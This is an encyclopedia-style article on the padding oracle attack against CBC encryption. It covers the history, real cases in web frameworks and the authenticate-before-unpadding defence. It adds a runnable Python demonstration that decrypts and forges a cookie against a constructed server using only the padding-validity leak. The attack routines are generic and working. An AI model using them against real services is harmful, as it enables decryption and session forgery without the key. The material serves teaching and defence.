Padding oracle attack
In cryptography, a padding oracle attack is an attack on a block cipher used in CBC mode with a padding scheme such as PKCS#7, where the "oracle" (usually a server) leaks whether the padding of a decrypted message is valid, for example through a distinguishable error message or a measurable timing difference. An attacker who can submit chosen ciphertexts and observe that single bit of information can decrypt messages, and in many cases forge ciphertexts of chosen plaintexts, under the server's key without ever learning the key. The standard defence is to authenticate the ciphertext (an AEAD mode, or encrypt-then-MAC) and reject it before any padding is examined, so that malformed and forged ciphertexts all fail in the same way.
The original attack was published in 2002 by Serge Vaudenay.[1] It has since been applied to encrypted cookies in several web application frameworks, including JavaServer Faces, Ruby on Rails[2] and ASP.NET.[3]
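The following is an added example, not code from the article or from any of the frameworks it cites. It implements CBC mode with PKCS#7 padding, a server that answers only "padding valid" or "padding invalid", and an attacker that uses that one bit to recover the plaintext of a cookie and then to forge a cookie of its own choosing. The block cipher is a four-round Feistel network keyed with HMAC-SHA256; it stands in for AES so the script runs with only the Python standard library, and the attack does not depend on which cipher sits underneath. The cookie contents and the `Server` class are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets

BLOCK = 16


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, rnd, half):
    # Feistel round function; any keyed PRF works here
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:BLOCK // 2]


def block_encrypt(key, block):
    # 4-round Feistel network: a stand-in for AES so the example runs offline
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, rnd, r))
    return l + r


def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, rnd, l)), l
    return l + r


def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key, iv, plaintext):
    out, prev = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key, iv, ciphertext):
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        c = ciphertext[i:i + BLOCK]
        out += _xor(block_decrypt(key, c), prev)
        prev = c
    return out


class Server:
    """Constructed victim: holds the key and leaks only whether padding was valid."""

    def __init__(self):
        self.key = secrets.token_bytes(32)
        self.queries = 0

    def encrypt(self, plaintext):
        iv = secrets.token_bytes(BLOCK)
        return iv + cbc_encrypt(self.key, iv, pkcs7_pad(plaintext))

    def padding_oracle(self, iv, ciphertext):
        self.queries += 1
        try:
            pkcs7_unpad(cbc_decrypt(self.key, iv, ciphertext))
            return True
        except ValueError:
            return False


def recover_intermediate(oracle, block):
    """Recover I = D_k(block) one byte at a time, last byte first, using only the oracle."""
    inter = bytearray(BLOCK)
    for j in range(BLOCK - 1, -1, -1):
        pad = BLOCK - j
        prefix = bytearray(BLOCK)
        for k in range(j + 1, BLOCK):
            prefix[k] = inter[k] ^ pad  # force already-known bytes to decrypt to `pad`
        for guess in range(256):
            prefix[j] = guess
            if not oracle(bytes(prefix), block):
                continue
            if j == BLOCK - 1:
                # Edge case: a hit on the last byte may be 0x02 0x02 rather than 0x01.
                # Disturbing the byte before it breaks the former but not the latter.
                prefix[j - 1] ^= 0xFF
                still_valid = oracle(bytes(prefix), block)
                prefix[j - 1] ^= 0xFF
                if not still_valid:
                    continue
            inter[j] = guess ^ pad
            break
        else:
            raise RuntimeError("no guess produced valid padding; oracle misbehaving")
    return bytes(inter)


def decrypt_via_oracle(oracle, iv, ciphertext):
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(_xor(recover_intermediate(oracle, cur), prev)
                     for prev, cur in zip(blocks, blocks[1:]))
    return pkcs7_unpad(plain)


def encrypt_via_oracle(oracle, plaintext):
    """Forge (iv, ciphertext) for a chosen plaintext, working backwards from a random last block."""
    padded = pkcs7_pad(plaintext)
    blocks = [padded[i:i + BLOCK] for i in range(0, len(padded), BLOCK)]
    cur = secrets.token_bytes(BLOCK)
    chain = [cur]
    for pblock in reversed(blocks):
        cur = _xor(recover_intermediate(oracle, cur), pblock)  # previous block (or IV)
        chain.append(cur)
    chain.reverse()
    return chain[0], b"".join(chain[1:])


def demo():
    server = Server()
    cookie = b"user=alice;role=guest;exp=1700000000"  # constructed sample
    token = server.encrypt(cookie)
    recovered = decrypt_via_oracle(server.padding_oracle, token[:BLOCK], token[BLOCK:])
    iv, ct = encrypt_via_oracle(server.padding_oracle, b"user=alice;role=admin")
    forged = pkcs7_unpad(cbc_decrypt(server.key, iv, ct))  # what the server would see
    return recovered, forged, server.queries


if __name__ == "__main__":
    print(demo())
```

Each block costs at most 256 oracle queries per byte (plus the one disambiguation query on the last byte), so recovering a 16-byte block never needs more than about 4,100 queries, which is why the attack is practical against a network service. The forgery works because the attacker never needs the key: choosing any final ciphertext block, learning what it decrypts to, and XORing that with the wanted plaintext yields the preceding block, all the way back to the IV.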
References
- ^ Serge Vaudenay (2002). Security Flaws Induced by CBC Padding: Applications to SSL, IPSEC, WTLS... (PDF). EUROCRYPT 2002.
- ^ Juliano Rizzo, Thai Duong (5 February 2010). Practical Padding Oracle Attacks Against Web Applications. Black Hat Europe 2010.
- ^ Dennis Fisher (13 September 2010). "'Padding Oracle' Crypto Attack Affects Millions of ASP.NET Apps". Threat Post.